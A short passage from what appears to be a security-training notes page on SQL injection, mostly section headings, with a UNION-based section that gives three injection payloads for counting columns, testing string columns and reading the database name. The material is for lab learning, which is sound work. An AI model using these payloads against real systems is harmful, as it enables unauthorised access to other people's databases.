SQL Injection

PreviousSQL Injection Lab NextZTH: Web 2

Last updated 3 years ago

Introduction

Basics of SQL Language

What is SQLi

How to detect SQLi

Error Based SQLi

Boolean Based SQLi

UNION Based SQLi

After testing different number of columns, we can find the right number of columns in the database with this search query

' UNION SELECT NULL,NULL,NULL,NULL,NULL -- //

We can also see that all of the columns can take a string input with this query

' UNION SELECT 'a','a','a','a','a' -- //

We can see the name of the database with this query

' UNION SELECT 'a',database(),'a','a','a' -- //

Automating Exploitation